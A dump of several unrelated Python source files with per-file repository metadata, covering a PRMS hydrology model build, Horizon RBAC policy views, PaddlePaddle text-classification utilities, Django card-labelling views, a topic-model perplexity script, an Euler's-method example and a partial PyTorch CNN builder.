soil_rech_init = bu.soil_rech_init(soil_rech_max.values)
# ksat mircrometer/sec to inches/day
self.ksat = self.ksat * 3.4 / 1000
ssr2gw_rate = bu.ssr2gw_rate(self.ksat, self.sand, soil_moist_max.values)
ssr2gw_sq = bu.ssr2gw_exp(self.nnodes)
slowcoef_lin = bu.slowcoef_lin(self.ksat, self.hru_aspect.values, cellsize, cellsize)
slowcoef_sq = bu.slowcoef_sq(self.ksat, self.hru_aspect.values, self.sand,
soil_moist_max.values, cellsize, cellsize)
# parameterize this
sat_threshold = ParameterRecord('sat_threshold',
np.ones_like(self.ksat).ravel(),
dimensions=[['nhru', self.nhru]],
datatype=2)
hru_percent_imperv = bu.hru_percent_imperv(self.nlcd)
hru_percent_imperv.values /= 100
carea_max = bu.carea_max(self.nlcd) / 100
vars_ = [soil_type, soil_moist_max, soil_moist_init, soil_rech_max, soil_rech_init,
ssr2gw_rate, ssr2gw_sq, slowcoef_lin, slowcoef_sq, hru_percent_imperv, carea_max,
self.hru_aspect, self.hru_slope, sat_threshold]
for v in vars_:
self.parameters.add_record_object(v)
def _prepare_rasters(self):
"""gdal warp is > 10x faster for nearest, here, we resample a single raster using nearest, and use
that raster's metadata to resample the rest with gdalwarp"""
_int = ['landfire_cover', 'landfire_type', 'nlcd']
_float = ['elevation', 'sand', 'clay', 'loam', 'awc', 'ksat']
rasters = _int + _float
first = True
modelgrid = GenerateFishnet(self.cfg.elevation, xcellsize=1000, ycellsize=1000)
for raster in rasters:
in_path = getattr(self.cfg, raster)
out_dir = os.path.join(self.cfg.raster_folder, 'resamples', self.cfg.hru_cellsize)
if not os.path.isdir(out_dir):
os.makedirs(out_dir)
out_path = os.path.join(out_dir, '{}.tif'.format(raster))
setattr(self.cfg, raster, out_path)
txt = out_path.replace('.tif', '.txt')
if os.path.exists(out_path) and os.path.exists(txt):
with rasterio.open(out_path, 'r') as src:
a = src.read(1)
if raster in ['sand', 'clay', 'loam', 'ksat', 'awc']:
a /= 100.
if first:
self.raster_meta = src.meta
first = False
setattr(self, raster, a)
continue
if raster in _float:
rsample, _dtype = 'min', 'Float32'
else:
rsample, _dtype = 'nearest', 'UInt16'
if first:
robj = flopy.utils.Raster.load(in_path)
array = robj.resample_to_grid(modelgrid, robj.bands[0], method=rsample, thread_pool=8)
example_raster = os.path.join(out_dir, 'flopy_raster.tif')
self.raster_meta = robj._meta
sa = copy(self.raster_meta['transform'])
transform = Affine(1000., sa[1], sa[2], sa[3], -1000., sa[5])
self.raster_meta.update({'height': array.shape[0],
'width': array.shape[1],
'transform': transform})
with rasterio.open(example_raster, 'w', **self.raster_meta) as ex:
ex.write(array, 1)
first = False
s = time.time()
b = self.bounds
warp = [self.cfg.gdal_warp_exe, in_path, out_path,
'-te', str(b[0]), str(b[1]), str(b[2] + self.res), str(b[3]),
'-ts', str(array.shape[1]), str(array.shape[0]),
'-multi', '-wo', 'NUM_THREADS=8',
'-ot', _dtype, '-r', rsample,
'-dstnodata', '0', '-srcnodata', '0', '-overwrite']
call(warp, stdout=open(os.devnull, 'wb'))
print('gdalwarp {} on {}: {} sec\n'.format(rsample, raster, time.time() - s))
with rasterio.open(out_path, 'r') as src:
a = src.read(1)
if raster in ['sand', 'clay', 'loam', 'ksat', 'awc']:
a /= 100.
if first:
self.raster_meta = src.meta
first = False
setattr(self, raster, a)
np.savetxt(txt, a)
def _prepare_lookups(self):
req_remaps = ['covtype.rmp', 'covdenwin.rmp', 'srain_intcp.rmp',
'snow_intcp.rmp', 'rtdepth.rmp', 'covdensum.rmp',
'wrain_intcp.rmp']
for rmp in req_remaps:
rmp_file = os.path.join(self.cfg.remap_folder, rmp)
lut = bu.build_lut(rmp_file)
_name = '{}_lut'.format(rmp.split('.')[0])
setattr(self, _name, lut)
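# --- unit-conversion sketch (editorial addition, not part of the original build) ---
# _build_soil_params() converts awc from meters to inches (x 1000 mm/m, / 25.4 mm/in)
# and scales ksat toward inches/day (86400 s/day / 25400 um/in ~= 3.4); a minimal
# standalone check of the awc factor:
def _meters_to_inches(meters):
    return meters * 1000 / 25.4

assert round(_meters_to_inches(0.254), 6) == 10.0  # 0.254 m == 254 mm == 10 in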
class MontanaPrmsModel:
def __init__(self, control_file, parameter_file, data_file):
self.control_file = control_file
self.parameter_file = parameter_file
self.data_file = data_file
self.control = ControlFile.load_from_file(control_file)
self.parameters = PrmsParameters.load_from_file(parameter_file)
self.data = PrmsData.load_from_file(data_file)
self.statvar = None
def run_model(self, stdout=None):
for obj_, var_ in [(self.control, 'control'),
(self.parameters, 'parameters'),
(self.data, 'data')]:
if not obj_:
raise TypeError('{} is not set, run "write_{}_file()"'.format(var_, var_))
buff = []
success = False
normal_msg = ['normal termination']
report, silent = True, False
argv = [self.control.get_values('executable_model')[0], self.control_file]
model_ws = os.path.dirname(self.control_file)
proc = Popen(argv, stdout=PIPE, stderr=STDOUT, cwd=model_ws)
while True:
line = proc.stdout.readline()
c = line.decode('utf-8')
if c != '':
for msg in normal_msg:
if msg in c.lower():
success = True
break
c = c.rstrip('\r\n')
if not silent:
print('{}'.format(c))
if report:
buff.append(c)
else:
break
if stdout:
with open(stdout, 'w') as fp:
if report:
for line in buff:
fp.write(line + '\n')
return success, buff
def get_statvar(self):
self.statvar = StatVar.load_from_control_object(self.control)
df = self.statvar.stat_df.drop(columns=['Hour', 'Minute', 'Second'])
return df
def features(shp):
with fiona.open(shp, 'r') as src:
return [f for f in src]
def plot_stats(stats):
fig, ax = plt.subplots(figsize=(16, 6))
ax.plot(stats.Date, stats.basin_cfs_1, color='r', linewidth=2.2, label="simulated")
ax.plot(stats.Date, stats.runoff_1, color='b', linewidth=1.5, label="measured")
ax.legend(bbox_to_anchor=(0.25, 0.65))
ax.set_xlabel("Date")
ax.set_ylabel("Streamflow, in cfs")
# ax.set_ylim([0, 2000])
# plt.savefig('/home/dgketchum/Downloads/hydrograph.png')
plt.show()
plt.close()
if __name__ == '__main__':
matplotlib.use('TkAgg')
conf = './model_files/uyws_parameters.ini'
stdout_ = '/media/research/IrrigationGIS/Montana/upper_yellowstone/gsflow_prep/uyws_carter_1000/out.txt'
prms_build = StandardPrmsBuild(conf)
prms_build.build_model_files()
prms = MontanaPrmsModel(prms_build.control_file,
prms_build.parameter_file,
prms_build.data_file)
prms.run_model(stdout_)
stats = prms.get_statvar()
plot_stats(stats)
# ========================= EOF ====================================================================
| 41.932341
| 108
| 0.538499
| 3,479
| 30,988
| 4.586663
| 0.169589
| 0.034468
| 0.014915
| 0.021307
| 0.297111
| 0.243216
| 0.191891
| 0.144137
| 0.110484
| 0.084978
| 0
| 0.016017
| 0.343197
| 30,988
| 738
| 109
| 41.98916
| 0.767995
| 0.027398
| 0
| 0.119643
| 0
| 0
| 0.075126
| 0.004153
| 0
| 0
| 0
| 0
| 0
| 1
| 0.033929
| false
| 0.001786
| 0.051786
| 0
| 0.094643
| 0.003571
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
c9af346978608c3c30e9cd43ee6263e02cda79fe
| 5,695
|
py
|
Python
|
openstack_dashboard/dashboards/admin/rbac_policies/views.py
|
stackhpc/horizon
|
0899f67657e0be62dd9e6be327c63bccb4607dc6
|
[
"Apache-2.0"
] | 930
|
2015-01-04T08:06:03.000Z
|
2022-03-13T18:47:13.000Z
|
openstack_dashboard/dashboards/admin/rbac_policies/views.py
|
stackhpc/horizon
|
0899f67657e0be62dd9e6be327c63bccb4607dc6
|
[
"Apache-2.0"
] | 26
|
2015-02-23T16:37:31.000Z
|
2020-07-02T08:37:41.000Z
|
openstack_dashboard/dashboards/admin/rbac_policies/views.py
|
stackhpc/horizon
|
0899f67657e0be62dd9e6be327c63bccb4607dc6
|
[
"Apache-2.0"
] | 1,040
|
2015-01-01T18:48:28.000Z
|
2022-03-19T08:35:18.000Z
|
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from collections import OrderedDict
from django.urls import reverse
from django.urls import reverse_lazy
from django.utils.translation import ugettext_lazy as _
from horizon import exceptions
from horizon import forms
from horizon import messages
from horizon import tables
from horizon import tabs
from horizon.utils import memoized
from openstack_dashboard import api
from openstack_dashboard.dashboards.admin.rbac_policies \
import forms as rbac_policy_forms
from openstack_dashboard.dashboards.admin.rbac_policies \
import tables as rbac_policy_tables
from openstack_dashboard.dashboards.admin.rbac_policies \
import tabs as rbac_policy_tabs
class IndexView(tables.DataTableView):
table_class = rbac_policy_tables.RBACPoliciesTable
page_title = _("RBAC Policies")
@memoized.memoized_method
def _get_tenants(self):
try:
tenants, has_more = api.keystone.tenant_list(self.request)
except Exception:
tenants = []
msg = _("Unable to retrieve information about the "
"policies' projects.")
exceptions.handle(self.request, msg)
tenant_dict = OrderedDict([(t.id, t.name) for t in tenants])
return tenant_dict
def _get_networks(self):
try:
networks = api.neutron.network_list(self.request)
except Exception:
networks = []
msg = _("Unable to retrieve information about the "
"policies' networks.")
exceptions.handle(self.request, msg)
return dict((n.id, n.name) for n in networks)
def _get_qos_policies(self):
qos_policies = []
try:
if api.neutron.is_extension_supported(self.request,
extension_alias='qos'):
qos_policies = api.neutron.policy_list(self.request)
except Exception:
msg = _("Unable to retrieve information about the "
"policies' qos policies.")
exceptions.handle(self.request, msg)
return dict((q.id, q.name) for q in qos_policies)
def get_data(self):
try:
rbac_policies = api.neutron.rbac_policy_list(self.request)
except Exception:
rbac_policies = []
messages.error(self.request,
_("Unable to retrieve RBAC policies."))
if rbac_policies:
tenant_dict = self._get_tenants()
network_dict = self._get_networks()
qos_policy_dict = self._get_qos_policies()
for p in rbac_policies:
# Set tenant name and object name
p.tenant_name = tenant_dict.get(p.tenant_id, p.tenant_id)
p.target_tenant_name = tenant_dict.get(p.target_tenant,
p.target_tenant)
if p.object_type == "network":
p.object_name = network_dict.get(p.object_id, p.object_id)
elif p.object_type == "qos_policy":
p.object_name = qos_policy_dict.get(p.object_id,
p.object_id)
return rbac_policies
class CreateView(forms.ModalFormView):
template_name = 'admin/rbac_policies/create.html'
form_id = "create_rbac_policy_form"
form_class = rbac_policy_forms.CreatePolicyForm
submit_label = _("Create RBAC Policy")
submit_url = reverse_lazy("horizon:admin:rbac_policies:create")
success_url = reverse_lazy("horizon:admin:rbac_policies:index")
page_title = _("Create A RBAC Policy")
class UpdateView(forms.ModalFormView):
context_object_name = 'rbac_policies'
template_name = 'admin/rbac_policies/update.html'
form_class = rbac_policy_forms.UpdatePolicyForm
form_id = "update_rbac_policy_form"
submit_label = _("Save Changes")
submit_url = 'horizon:admin:rbac_policies:update'
success_url = reverse_lazy('horizon:admin:rbac_policies:index')
page_title = _("Update RBAC Policy")
def get_context_data(self, **kwargs):
context = super().get_context_data(**kwargs)
args = (self.kwargs['rbac_policy_id'],)
context["rbac_policy_id"] = self.kwargs['rbac_policy_id']
context["submit_url"] = reverse(self.submit_url, args=args)
return context
@memoized.memoized_method
def _get_object(self, *args, **kwargs):
rbac_policy_id = self.kwargs['rbac_policy_id']
try:
return api.neutron.rbac_policy_get(self.request, rbac_policy_id)
except Exception:
redirect = self.success_url
msg = _('Unable to retrieve rbac policy details.')
exceptions.handle(self.request, msg, redirect=redirect)
def get_initial(self):
rbac_policy = self._get_object()
return {'rbac_policy_id': rbac_policy['id'],
'target_tenant': rbac_policy['target_tenant']}
class DetailView(tabs.TabView):
tab_group_class = rbac_policy_tabs.RBACDetailsTabs
template_name = 'horizon/common/_detail.html'
page_title = "{{ rbac_policy.id }}"
| 39.275862
| 78
| 0.657419
| 692
| 5,695
| 5.16763
| 0.239884
| 0.072707
| 0.042785
| 0.02349
| 0.321309
| 0.227349
| 0.183725
| 0.150727
| 0.032998
| 0.032998
| 0
| 0.000948
| 0.258999
| 5,695
| 144
| 79
| 39.548611
| 0.846446
| 0.097278
| 0
| 0.1875
| 0
| 0
| 0.149571
| 0.052457
| 0
| 0
| 0
| 0
| 0
| 1
| 0.0625
| false
| 0
| 0.125
| 0
| 0.464286
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
c9b0a85450199612c6bc6f56c812cbb9f71f501d
| 3,585
|
py
|
Python
|
legacy/text_classification/utils.py
|
FrancisLiang/models-1
|
e14d5bc1ab36d0dd11977f27cff54605bf99c945
|
[
"Apache-2.0"
] | 4
|
2020-01-04T13:15:02.000Z
|
2021-07-21T07:50:02.000Z
|
legacy/text_classification/utils.py
|
FrancisLiang/models-1
|
e14d5bc1ab36d0dd11977f27cff54605bf99c945
|
[
"Apache-2.0"
] | 2
|
2019-06-26T03:21:49.000Z
|
2019-09-19T09:43:42.000Z
|
legacy/text_classification/utils.py
|
FrancisLiang/models-1
|
e14d5bc1ab36d0dd11977f27cff54605bf99c945
|
[
"Apache-2.0"
] | 3
|
2019-10-31T07:18:49.000Z
|
2020-01-13T03:18:39.000Z
|
import logging
import os
import argparse
from collections import defaultdict
logger = logging.getLogger("paddle")
logger.setLevel(logging.INFO)
def parse_train_cmd():
parser = argparse.ArgumentParser(
description="PaddlePaddle text classification example.")
parser.add_argument(
"--nn_type",
type=str,
help=("A flag that defines which type of network to use, "
"available: [dnn, cnn]."),
default="dnn")
parser.add_argument(
"--train_data_dir",
type=str,
required=False,
help=("The path of training dataset (default: None). If this parameter "
"is not set, paddle.dataset.imdb will be used."),
default=None)
parser.add_argument(
"--test_data_dir",
type=str,
required=False,
help=("The path of testing dataset (default: None). If this parameter "
"is not set, paddle.dataset.imdb will be used."),
default=None)
parser.add_argument(
"--word_dict",
type=str,
required=False,
help=("The path of word dictionary (default: None). If this parameter "
"is not set, paddle.dataset.imdb will be used. If this parameter "
"is set, but the file does not exist, word dictionay "
"will be built from the training data automatically."),
default=None)
parser.add_argument(
"--label_dict",
type=str,
required=False,
help=("The path of label dictionay (default: None).If this parameter "
"is not set, paddle.dataset.imdb will be used. If this parameter "
"is set, but the file does not exist, word dictionay "
"will be built from the training data automatically."),
default=None)
parser.add_argument(
"--batch_size",
type=int,
default=32,
help="The number of training examples in one forward/backward pass.")
parser.add_argument(
"--num_passes",
type=int,
default=10,
help="The number of passes to train the model.")
parser.add_argument(
"--model_save_dir",
type=str,
required=False,
help=("The path to save the trained models."),
default="models")
return parser.parse_args()
def build_dict(data_dir,
save_path,
use_col=0,
cutoff_fre=0,
insert_extra_words=[]):
values = defaultdict(int)
for file_name in os.listdir(data_dir):
file_path = os.path.join(data_dir, file_name)
if not os.path.isfile(file_path):
continue
with open(file_path, "r") as fdata:
for line in fdata:
line_splits = line.strip().split("\t")
if len(line_splits) <= use_col: continue  # index use_col must exist
for w in line_splits[use_col].split():
values[w] += 1
with open(save_path, "w") as f:
for w in insert_extra_words:
f.write("%s\t-1\n" % (w))
for v, count in sorted(
values.items(), key=lambda x: x[1], reverse=True):
if count < cutoff_fre:
break
f.write("%s\t%d\n" % (v, count))
def load_dict(dict_path):
return dict((line.strip().split("\t")[0], idx)
for idx, line in enumerate(open(dict_path, "r").readlines()))
def load_reverse_dict(dict_path):
return dict((idx, line.strip().split("\t")[0])
for idx, line in enumerate(open(dict_path, "r").readlines()))
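# --- usage sketch (editorial addition; the file name is hypothetical) ---
# Dictionary files hold one "token<TAB>count" pair per line, so a built
# dictionary round-trips through load_dict()/load_reverse_dict():
def _demo_round_trip(dict_path="word_dict_example.txt"):
    with open(dict_path, "w") as f:
        f.write("<unk>\t-1\nhello\t3\nworld\t2\n")
    word2id = load_dict(dict_path)        # {'<unk>': 0, 'hello': 1, 'world': 2}
    id2word = load_reverse_dict(dict_path)
    assert id2word[word2id["hello"]] == "hello"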
| 33.194444
| 80
| 0.577406
| 456
| 3,585
| 4.425439
| 0.309211
| 0.035679
| 0.067393
| 0.050545
| 0.453915
| 0.416254
| 0.416254
| 0.416254
| 0.399405
| 0.362735
| 0
| 0.004444
| 0.309623
| 3,585
| 107
| 81
| 33.504673
| 0.810909
| 0
| 0
| 0.37234
| 0
| 0
| 0.298466
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.042553
| false
| 0.031915
| 0.042553
| 0.021277
| 0.117021
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
c9b413225370fcaafee9296e6fca98be93952f44
| 2,188
|
py
|
Python
|
cards/views.py
|
KrTG/CardLabeling
|
8d267cf5d2dcc936005850a8f791115b3f716c92
|
[
"Apache-2.0"
] | null | null | null |
cards/views.py
|
KrTG/CardLabeling
|
8d267cf5d2dcc936005850a8f791115b3f716c92
|
[
"Apache-2.0"
] | null | null | null |
cards/views.py
|
KrTG/CardLabeling
|
8d267cf5d2dcc936005850a8f791115b3f716c92
|
[
"Apache-2.0"
] | null | null | null |
from .models import Card
from .helpers import fetch_unidentified, populate_db
from django.shortcuts import render, redirect
from django.http import Http404, HttpResponse
import json
def index(request):
next_card = fetch_unidentified()  # renamed to avoid shadowing the built-in next()
if next_card:
return redirect('card', card_num=next_card)
else:
return redirect('done')
def done(request):
cards = Card.objects.all()
card_list = [(card.num, card.color, card.rank) for card in cards]  # avoid shadowing list()
return HttpResponse(json.dumps(card_list))
def reset(request):
if request.method == 'GET':
return render(request, 'reset.html')
elif request.method == 'POST':
confirmation_text = request.POST.get('confirmation')
print(confirmation_text)
if confirmation_text.upper() == "RESET":
populate_db()
return HttpResponse("reset")
else:
return HttpResponse("not reset")
def card(request, card_num):
if request.method == 'GET':
try:
card = Card.objects.get(num=card_num)
except Card.DoesNotExist:
raise Http404("Card does not exist")
image_path = 'training_data/' + str(card_num) + '.png'
if card.color != '':
next_num = card_num + 1
return render(request, 'cards/card_done.html',
{'identified_card': str(card), 'path': image_path,
'next': next_num })
return render(request, 'cards/card.html',
{'path': image_path, 'card_num': card_num})
elif request.method == 'POST':
try:
card = Card.objects.get(num=card_num)
trash = request.POST.get('trash', None)
color = request.POST.get('color', None)
rank = request.POST.get('rank', None)
if trash == 'true':
card.color = 'not_card'
card.save()
elif color and rank:
card.color = color
card.rank = rank
card.save()
except Card.DoesNotExist:
raise Http404("Card does not exist")
return redirect('index')
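# --- URLconf sketch (editorial addition; the module layout is an assumption) ---
# The redirect() calls above resolve the route names 'index', 'card' and
# 'done', so a matching urls.py would look roughly like:
#
#   from django.urls import path
#   from . import views
#
#   urlpatterns = [
#       path('', views.index, name='index'),
#       path('done/', views.done, name='done'),
#       path('reset/', views.reset, name='reset'),
#       path('card/<int:card_num>/', views.card, name='card'),
#   ]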
| 30.388889
| 64
| 0.55713
| 241
| 2,188
| 4.958506
| 0.26971
| 0.05272
| 0.046862
| 0.030126
| 0.182427
| 0.135565
| 0.135565
| 0.135565
| 0.083682
| 0
| 0
| 0.006826
| 0.330439
| 2,188
| 71
| 65
| 30.816901
| 0.808874
| 0
| 0
| 0.285714
| 0
| 0
| 0.100548
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.071429
| false
| 0
| 0.089286
| 0
| 0.321429
| 0.017857
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
c9b43f16dd23711b256eacbc743cd82a999578fd
| 2,439
|
py
|
Python
|
cptm/experiment_calculate_perplexity.py
|
egpbos/cptm
|
c5f310858c341040b4afd166cf628aeee6845159
|
[
"Apache-2.0"
] | 13
|
2016-03-14T14:58:04.000Z
|
2020-11-03T22:48:59.000Z
|
cptm/experiment_calculate_perplexity.py
|
egpbos/cptm
|
c5f310858c341040b4afd166cf628aeee6845159
|
[
"Apache-2.0"
] | 5
|
2015-10-30T12:34:16.000Z
|
2017-10-27T04:55:07.000Z
|
cptm/experiment_calculate_perplexity.py
|
egpbos/cptm
|
c5f310858c341040b4afd166cf628aeee6845159
|
[
"Apache-2.0"
] | 3
|
2016-03-03T10:49:05.000Z
|
2018-02-03T14:36:59.000Z
|
"""Calculate opinion perplexity for different numbers of topics
Calculate opinion perplexity for the test set as described in [Fang et al.
2012] section 5.1.1.
This script should be run after experiment_number_of_topics.py.
Usage: python cptm/experiment_calculate_perplexity.py /path/to/experiment.json.
"""
import pandas as pd
import logging
from multiprocessing import Pool
import argparse
from cptm.utils.experiment import load_config, get_corpus, get_sampler
def calculate_perplexity(config, corpus, nPerplexity, nTopics):
sampler = get_sampler(config, corpus, nTopics, initialize=False)
results = []
for s in nPerplexity:
logger.info('doing perplexity calculation ({}, {})'.format(nTopics, s))
tw_perp, ow_perp = sampler.perplexity(index=s)
results.append((nTopics, s, tw_perp, ow_perp))
logger.info('finished perplexity calculation for {} topics'.
format(nTopics))
return results
logger = logging.getLogger(__name__)
logging.basicConfig(format='%(levelname)s : %(message)s', level=logging.INFO)
logging.getLogger('gensim').setLevel(logging.ERROR)
logging.getLogger('CPTCorpus').setLevel(logging.ERROR)
logging.getLogger('CPT_Gibbs').setLevel(logging.ERROR)
parser = argparse.ArgumentParser()
parser.add_argument('json', help='json file containing experiment '
'configuration.')
args = parser.parse_args()
config = load_config(args.json)
corpus = get_corpus(config)
nTopics = config.get('expNumTopics')
nPerplexity = [0] + list(range(9, config.get('nIter') + 1, 10))
# calculate perplexity
pool = Pool(processes=config.get('nProcesses'))
results = [pool.apply_async(calculate_perplexity, args=(config, corpus,
nPerplexity, n))
# reverse list, so longest calculation is started first
for n in nTopics[::-1]]
pool.close()
pool.join()
# aggregate and save results
data = [p.get() for p in results]
topic_perp = pd.DataFrame(columns=nTopics, index=nPerplexity)
opinion_perp = pd.DataFrame(columns=nTopics, index=nPerplexity)
for result in data:
for n, s, tw_perp, ow_perp in result:
topic_perp.at[s, n] = tw_perp
opinion_perp.at[s, n] = ow_perp
outDir = config.get('outDir')
logger.info('writing perplexity results to {}'.format(outDir.format('')))
topic_perp.to_csv(outDir.format('perplexity_topic.csv'))
opinion_perp.to_csv(outDir.format('perplexity_opinion.csv'))
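# --- usage sketch (editorial addition) ---
# The CSVs written above are nPerplexity-by-nTopics tables; they can be read
# back for plotting with the saved index restored:
def _load_perplexity(out_dir):
    return pd.read_csv(out_dir.format('perplexity_topic.csv'), index_col=0)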
| 33.410959
| 79
| 0.727347
| 321
| 2,439
| 5.398754
| 0.389408
| 0.025967
| 0.012118
| 0.01558
| 0.175995
| 0.110791
| 0.051933
| 0
| 0
| 0
| 0
| 0.006305
| 0.154572
| 2,439
| 72
| 80
| 33.875
| 0.834142
| 0.166052
| 0
| 0
| 0
| 0
| 0.14321
| 0.010864
| 0
| 0
| 0
| 0
| 0
| 1
| 0.022222
| false
| 0
| 0.111111
| 0
| 0.155556
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
c9b5574ee7cafcbc4a7c1273ed0bb1bc35434615
| 819
|
py
|
Python
|
Eulers method.py
|
pramotharun/Numerical-Methods-with-Python
|
bd5676bcc4ac5defd13608728df2387b5fdcdfcb
|
[
"MIT"
] | null | null | null |
Eulers method.py
|
pramotharun/Numerical-Methods-with-Python
|
bd5676bcc4ac5defd13608728df2387b5fdcdfcb
|
[
"MIT"
] | null | null | null |
Eulers method.py
|
pramotharun/Numerical-Methods-with-Python
|
bd5676bcc4ac5defd13608728df2387b5fdcdfcb
|
[
"MIT"
] | null | null | null |
# Euler's method
import numpy as np
def dy(y, x):
    """Derivative dy/dx; change this function based on the question. Example: y - x"""
    return y - x
y0 = 0.5  # or: float(input("what is y(0)? "))
h = 0.1  # or: float(input("h? "))
x_final = 0.3  # or: float(input("x_final? "))
#initiating input variables
x = 0
y = y0
# remember to change yn+1 and xn+1 values if you already know them!!!
ynew = 0
xnew = 0
i = 0
#####################################################
iterations = x_final/h
while x <= x_final:
    derivative_of_y = dy(y, x)
    xnew = x + h
    ynew = y + (xnew - x) * derivative_of_y
    print("iteration:", i)
    print("x =", xnew)
    print("y =", ynew)
    print()
    x = xnew
    y = ynew
    i += 1
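# --- verification sketch (editorial addition) ---
# For dy/dx = y - x with y(0) = 0.5 the exact solution is
# y(x) = x + 1 - 0.5*exp(x), so the Euler estimate above can be checked:
y_exact = x + 1 - 0.5 * np.exp(x)
print("Euler estimate:", y, " exact:", y_exact, " abs error:", abs(y - y_exact))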
| 19.5
| 76
| 0.543346
| 129
| 819
| 3.356589
| 0.418605
| 0.018476
| 0.046189
| 0.050808
| 0.060046
| 0.060046
| 0
| 0
| 0
| 0
| 0
| 0.026144
| 0.252747
| 819
| 41
| 77
| 19.97561
| 0.681373
| 0.304029
| 0
| 0.071429
| 0
| 0
| 0.090373
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.035714
| false
| 0
| 0.035714
| 0
| 0.107143
| 0.285714
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
c9b764a791904b90c564bbc7b72661cf5b307b36
| 18,896
|
py
|
Python
|
modules/network_dictionary_builder.py
|
shartzog/CovidCNN
|
68bafe185c53f98b896ee01fdcf99f828f251036
|
[
"MIT"
] | null | null | null |
modules/network_dictionary_builder.py
|
shartzog/CovidCNN
|
68bafe185c53f98b896ee01fdcf99f828f251036
|
[
"MIT"
] | null | null | null |
modules/network_dictionary_builder.py
|
shartzog/CovidCNN
|
68bafe185c53f98b896ee01fdcf99f828f251036
|
[
"MIT"
] | null | null | null |
"""
Contains the Net and NetDictionary classes for creating a random collection of CNN structures
or loading a previously created collection.
"""
from __future__ import division, print_function
from random import random
import os.path
import torch
from torch import nn
from torch import optim
from torch.nn import functional as F
import numpy as np
from numpy.random import randint as r_i
from tqdm import tqdm
DEBUG = False #prints tensor size after each network layer during network creation
DEVICE = 'cuda' if torch.cuda.is_available() else 'cpu'
if torch.cuda.is_available():
torch.cuda.set_device(0)
else:
print('**** CUDA not available - continuing with CPU ****')
#global classes
class Net(nn.Module):
"""
Build pytorch module using eval() on incoming model tensor and lists of eval strings
for layers and params.
"""
def __init__(self, modelinputtensor, layerlist, layerparams, **kwargs):
"""
args:
modelinputtensor: example model input tensor (including an arbitrary batch dimension)
layerlist: list of pytorch nn functions given as their 'F' namespace equivalents.
Example: 'nn.MaxPool2d' should be supplied as 'F.max_pool2d'
layerparams: list of _independent_ params in their nn form and passed as a tuple.
kwargs:
activations: list of activation functions for forward layers. the length
of the list must match the length of layerlist exactly even
though the activation function supplied for any pooling
layers will be ignored and the final value supplied will
always be replaced by Sigmoid.
Example:
The first conv2d layer will have 3 params in a tuple
of form (in_channels, out_channels, kernel_size).
Subsequent conv2d layers will have _2_ params in a tuple
of form (out_channels, kernel_size) since the in_channels
are determined by the previous layer.
Pooling layers will always have params of the form (x, y)
corresponding to the pooling window size.
Linear layers will always have a single param corresponding to
the number of out features for the layer since input
features are determined by the preceding layer)
"""
super(Net, self).__init__()
self.activations = kwargs.get('activations', ['F.relu' for layer in layerlist])
self.lyrs, self.fwdlyrs = self.get_layers(modelinputtensor, layerlist, layerparams, self.activations, DEBUG)
def forward(self, x):
"""
"""
for f in self.fwdlyrs:
x = eval(f)
return torch.sigmoid(x)
def get_layers(self, testtensor, funcs, params, activations, debug):
"""
Build network layers from supplied test tensor, funcs, and param eval strings.
"""
initlayers = nn.ModuleList()
fwdlayers = list()
if debug == 1:
print(testtensor.size())
lastsize = None
lyr = 0
with torch.no_grad():
for fn, pa in zip(funcs, params):
if lastsize is not None:
if fn.__name__ == 'conv2d':
pa = (lastsize[1], pa[0], pa[1])
elif fn.__name__ == 'linear':
if not testtensor.ndim == 2:
testtensor = testtensor.view(-1, self.num_flat_features(testtensor))
fwdlayers.append("x.view(-1,self.num_flat_features(x))")
lastsize = testtensor.size()
pa = (lastsize[1], pa)
if fn.__name__ == 'conv2d':
paeval = ",".join(tuple(map(str, (pa[1], pa[0], pa[2], pa[2]))))
paeval = "torch.tensor(np.random.rand(" + paeval + "), dtype=torch.float32)"
elif fn.__name__ == 'max_pool2d':
paeval = ",".join(tuple(map(str, pa)))
elif fn.__name__ == 'linear':
paeval = ",".join(tuple(map(str, (pa[1], pa[0]))))
paeval = "torch.tensor(np.random.rand(" + paeval + "),dtype=torch.float32)"
if not fn.__name__ == 'linear' or pa[0] > pa[1]:
